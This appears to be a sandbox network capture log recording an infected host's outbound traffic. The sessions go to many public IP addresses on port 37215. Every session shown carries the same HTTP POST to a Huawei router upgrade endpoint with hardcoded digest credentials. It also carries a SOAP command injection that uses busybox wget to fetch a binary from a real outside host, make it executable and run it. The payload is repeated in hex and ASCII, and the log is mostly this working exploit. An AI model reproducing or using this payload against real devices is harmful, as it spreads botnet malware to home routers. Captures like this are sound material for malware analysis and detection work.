                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1426192.168.2.1536366222.91.114.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400432110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1427192.168.2.1554208122.167.108.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400433064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1428192.168.2.154736494.204.6.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400450945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1429192.168.2.1534166222.82.62.20037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400468111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1430192.168.2.1544082197.74.233.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471704960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1431192.168.2.1545614102.229.97.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471729994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1432192.168.2.1560040197.235.216.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471729994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1433192.168.2.1541058102.37.224.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471730947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1434192.168.2.154318037.76.15.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471749067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1435192.168.2.1552502122.141.159.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471762896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1436192.168.2.153968437.209.63.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471793890 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
